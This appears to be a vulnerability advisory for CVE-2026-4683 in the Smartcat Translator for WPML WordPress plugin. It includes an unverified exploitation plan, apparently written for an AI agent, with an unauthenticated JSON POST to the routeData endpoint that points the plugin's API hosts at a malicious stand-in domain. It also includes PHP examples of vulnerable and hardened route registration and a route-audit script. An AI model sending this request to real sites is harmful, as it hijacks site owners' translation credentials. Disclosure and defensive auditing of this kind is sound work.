CVE-2026-4683

Smartcat Translator for WPML <= 3.1.77 - Missing Authorization to Unauthenticated Plugin Settings Update

Severity: medium (Missing Authorization)
CVSS Score: 6.5
Patched in: 3.1.78
Time to patch: 1d

Description

The Smartcat Translator for WPML plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'routeData' REST endpoint in all versions up to, and including, 3.1.77. This makes it possible for unauthenticated attackers to overwrite the plugin's Smartcat API credentials (account ID, API secret key, hub key, API host, and hub host), effectively hijacking the translation service or causing a denial of service.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: Low

Technical Details

Affected versions: <= 3.1.77
Published: May 14, 2026
Last updated: May 15, 2026
Affected plugin: smartcat-wpml

What Changed in the Fix

Changes introduced in v3.1.78

Source Code

WordPress.org SVN
Research Plan (Unverified)

Exploitation Research Plan: CVE-2026-4683 Smartcat Translator for WPML

1. Vulnerability Summary

The Smartcat Translator for WPML plugin (up to version 3.1.77) contains a missing authorization vulnerability in its REST API implementation. Specifically, the routeData endpoint is registered without a proper permission_callback (or with a callback that fails to check for administrative capabilities), allowing unauthenticated users to submit POST requests that modify the plugin's core configuration. An attacker can overwrite Smartcat API credentials, effectively hijacking the translation workflow or causing a Denial of Service (DoS) by pointing the plugin to a malicious or non-existent API host.

2. Attack Vector Analysis

  • Endpoint: /wp-json/smartcat/v1/routeData (Namespace smartcat/v1 is inferred from SMARTCAT_API_PREFIX in config.php).
  • HTTP Method: POST
  • Payload Format: JSON
  • Authentication: None Required (Unauthenticated).
  • Preconditions: The plugin must be active. WPML is technically a requirement for the plugin's operation, but the REST endpoint likely initializes regardless.

3. Code Flow

  1. Registration: The plugin registers a REST route using register_rest_route(). Based on the description, this occurs in an initialization sequence (likely within includes/Services/API/ or a class initialized in SmartcatWpml.php).
  2. Vulnerable Configuration: The route configuration for routeData lacks a permission_callback that restricts access to users with manage_options or activate_plugins capabilities. It may use __return_true or be omitted entirely.
  3. Processing: The callback function associated with the route (e.g., update_route_data or handle_route_data) accepts parameters from the WP_REST_Request object.
  4. Sink: The callback uses update_option() or a similar mechanism to save the following values into the WordPress database:
    • smartcat_account_id (inferred)
    • smartcat_api_key (inferred)
    • smartcat_hub_key (inferred)
    • smartcat_api_host (inferred)
    • smartcat_hub_host (inferred)
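The code flow above is the standard WordPress REST missing-authorization pattern. The following is an added example, not the plugin's code and not taken from the advisory: it shows the vulnerable registration shape (permission_callback set to __return_true, or absent) beside a hardened registration that requires the manage_options capability and declares validated arguments. The namespace, parameter names and option names follow the advisory's inferred values; the function names and the https-only host validation are assumptions.

```php
<?php
/**
 * Added example (not the plugin's code): the missing-authorization pattern
 * described in the advisory for the routeData route, and a hardened version.
 * Namespace, parameter names and option names follow the advisory's inferred
 * values; the function names are assumptions.
 */

/** Shared callback: writes the submitted credentials into wp_options (the sink). */
function smartcat_example_update_route_data( WP_REST_Request $request ) {
    // Request parameter -> option name (option names are inferred in the advisory).
    $map = array(
        'accountId' => 'smartcat_account_id',
        'apiKey'    => 'smartcat_api_key',
        'hubKey'    => 'smartcat_hub_key',
        'apiHost'   => 'smartcat_api_host',
        'hubHost'   => 'smartcat_hub_host',
    );
    foreach ( $map as $param => $option ) {
        update_option( $option, $request->get_param( $param ), false );
    }
    return rest_ensure_response( array( 'success' => true ) );
}

/** Vulnerable shape: __return_true (or no permission_callback at all) lets any visitor reach the sink. */
function smartcat_example_register_vulnerable() {
    register_rest_route( 'smartcat/v1', '/routeData', array(
        'methods'             => WP_REST_Server::CREATABLE, // POST
        'callback'            => 'smartcat_example_update_route_data',
        'permission_callback' => '__return_true',           // no authorization check
    ) );
}

/** Assumed policy: only https URLs with a host name are accepted for the API/hub host parameters. */
function smartcat_example_validate_https_url( $value ) {
    $parts = wp_parse_url( $value );
    return is_array( $parts )
        && isset( $parts['scheme'], $parts['host'] )
        && 'https' === strtolower( $parts['scheme'] );
}

/** Hardened shape: capability check plus declared, validated and sanitized arguments. */
function smartcat_example_register_hardened() {
    $text_arg = array(
        'type'              => 'string',
        'required'          => true,
        'sanitize_callback' => 'sanitize_text_field',
    );
    $url_arg = array(
        'type'              => 'string',
        'required'          => true,
        'validate_callback' => 'smartcat_example_validate_https_url',
        'sanitize_callback' => 'esc_url_raw',
    );
    register_rest_route( 'smartcat/v1', '/routeData', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'smartcat_example_update_route_data',
        // A settings write needs the same capability as the admin settings screen.
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        'args' => array(
            'accountId' => $text_arg,
            'apiKey'    => $text_arg,
            'hubKey'    => $text_arg,
            'apiHost'   => $url_arg,
            'hubHost'   => $url_arg,
        ),
    ) );
}

// Only the hardened registration is hooked; the vulnerable one is kept for comparison.
add_action( 'rest_api_init', 'smartcat_example_register_hardened' );
```

With the capability check in place an unauthenticated POST is answered with a 401 rest_forbidden error before the callback runs. Cookie-authenticated callers are affected too: WordPress drops the logged-in user when the X-WP-Nonce header is missing or invalid, so a real permission_callback is also what makes the nonce matter. The argument schema limits what reaches update_option(), and the host validator can be tightened further to an allowlist of known Smartcat hosts if those are fixed for a deployment.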

4. Nonce Acquisition Strategy

According to the WordPress REST API design, unauthenticated requests (those without a session cookie) do not require a _wpnonce or X-WP-Nonce header. Since this is an unauthenticated "Missing Authorization" vulnerability, no nonce is needed for the exploit payload if sent from a "clean" session.

Verifying that no nonce is required:
If the endpoint were intended for authenticated users, the plugin might enqueue a nonce in the admin UI.

  • JS Localization Key: window.smartcat_data or window.sc_api_config (inferred).
  • Extraction method:
    1. Use browser_navigate to the plugin settings page: /wp-admin/settings.php?page=smartcat-wpml.
    2. Use browser_eval to search for localized nonces.

However, for unauthenticated exploitation, we will proceed by omitting the nonce.

5. Exploitation Strategy

The goal is to overwrite the Smartcat API settings to demonstrate unauthorized data modification.

Step 1: Discover the exact REST Route
Check the site's REST index to confirm the namespace and endpoint.

  • Request: GET /wp-json/
  • Tool: http_request

Step 2: Submit the Malicious Configuration
Send a POST request to the routeData endpoint with "attacker-controlled" values.

  • Request URL: http://localhost:8080/wp-json/smartcat/v1/routeData
  • Method: POST
  • Headers: Content-Type: application/json
  • Payload:
{
    "accountId": "VULNERABILITY_CONFIRMED_ACCOUNT",
    "apiKey": "VULNERABILITY_CONFIRMED_KEY",
    "hubKey": "VULNERABILITY_CONFIRMED_HUB",
    "apiHost": "https://malicious-api.example.com",
    "hubHost": "https://malicious-hub.example.com"
}

Note: Parameter names are based on admin/assets/js/smartcat-ui.js references to accountId, apiKey, etc.

6. Test Data Setup

  1. Install Plugin: Ensure smartcat-wpml version 3.1.77 is installed and active.
  2. Initial State: (Optional) Configure legitimate-looking dummy credentials using WP-CLI so that the change is more obvious.
    wp option update smartcat_account_id "original_id"
    wp option update smartcat_api_key "original_key"

7. Expected Results

  • Response Code: 200 OK or 201 Created.
  • Response Body: Likely a JSON success message like {"success": true} or returning the updated settings object.
  • State Change: The WordPress options table should now contain the attacker's values.

8. Verification Steps

After performing the http_request, verify the modification via WP-CLI:

# Check updated options
wp option get smartcat_account_id
wp option get smartcat_api_key
wp option get smartcat_api_host

Confirm the output matches VULNERABILITY_CONFIRMED_ACCOUNT, etc.
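For a defender, the more useful check after patching (or on any site) is whether any registered REST route still accepts write methods without a real permission_callback. The following is an added example, not part of the advisory or the plugin: it walks the routes WordPress has registered and reports such handlers. It is meant to be run inside WordPress, for example with `wp eval-file rest-audit.php`; the function name and output format are assumptions.

```php
<?php
/**
 * Added example (not the plugin's or the advisory's code): audit registered REST
 * routes and report handlers that accept write methods without a real
 * permission_callback. Run inside WordPress, e.g. `wp eval-file rest-audit.php`.
 * The function name and output format are assumptions.
 */

/**
 * Returns one finding per handler that accepts POST/PUT/PATCH/DELETE and either
 * has no permission_callback (WordPress warns about this since 5.5 but still
 * registers the route) or uses __return_true.
 * An optional namespace such as 'smartcat/v1' restricts the scan to that prefix.
 */
function smartcat_example_audit_rest_routes( $namespace = '' ) {
    $server   = rest_get_server(); // fires rest_api_init, so plugin routes are registered
    $findings = array();
    $writes   = array( 'POST', 'PUT', 'PATCH', 'DELETE' );

    foreach ( $server->get_routes() as $route => $handlers ) {
        if ( '' !== $namespace && 0 !== strpos( $route, '/' . $namespace . '/' ) ) {
            continue;
        }
        foreach ( $handlers as $handler ) {
            // 'methods' is normalized by register_rest_route() to array( 'POST' => true, ... ).
            $methods = array_keys( array_filter( (array) $handler['methods'] ) );
            $exposed = array_intersect( $methods, $writes );
            if ( empty( $exposed ) ) {
                continue;
            }
            $perm = isset( $handler['permission_callback'] ) ? $handler['permission_callback'] : null;
            if ( null === $perm ) {
                $status = 'missing';
            } elseif ( '__return_true' === $perm ) {
                $status = '__return_true';
            } else {
                continue; // has a real check; whether it tests the right capability needs code review
            }
            $findings[] = array(
                'route'   => $route,
                'methods' => implode( ',', $exposed ),
                'perm'    => $status,
            );
        }
    }
    return $findings;
}

$findings = smartcat_example_audit_rest_routes( 'smartcat/v1' );
if ( empty( $findings ) ) {
    echo "No write routes without a permission_callback found.\n";
}
foreach ( $findings as $f ) {
    printf( "%s [%s] permission_callback: %s\n", $f['route'], $f['methods'], $f['perm'] );
}
```

Pass an empty namespace to scan every route on the site. The audit only sees what is declared at registration: a closure that unconditionally returns true, or a callback that checks a capability weaker than the action needs, is not flagged and still has to be found by reading the plugin's source.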

9. Alternative Approaches

If the JSON keys in the payload differ (e.g., the plugin expects a nested object), analyze the admin/assets/js/smartcat-ui.js file more deeply for the registerCredentials function logic:

  • Search for the string routeData in the plugin's PHP directory using grep -r "routeData" ..
  • If the endpoint requires a specific "hub key" format to validate, it may be necessary to match the structure expected by the HubClient class.
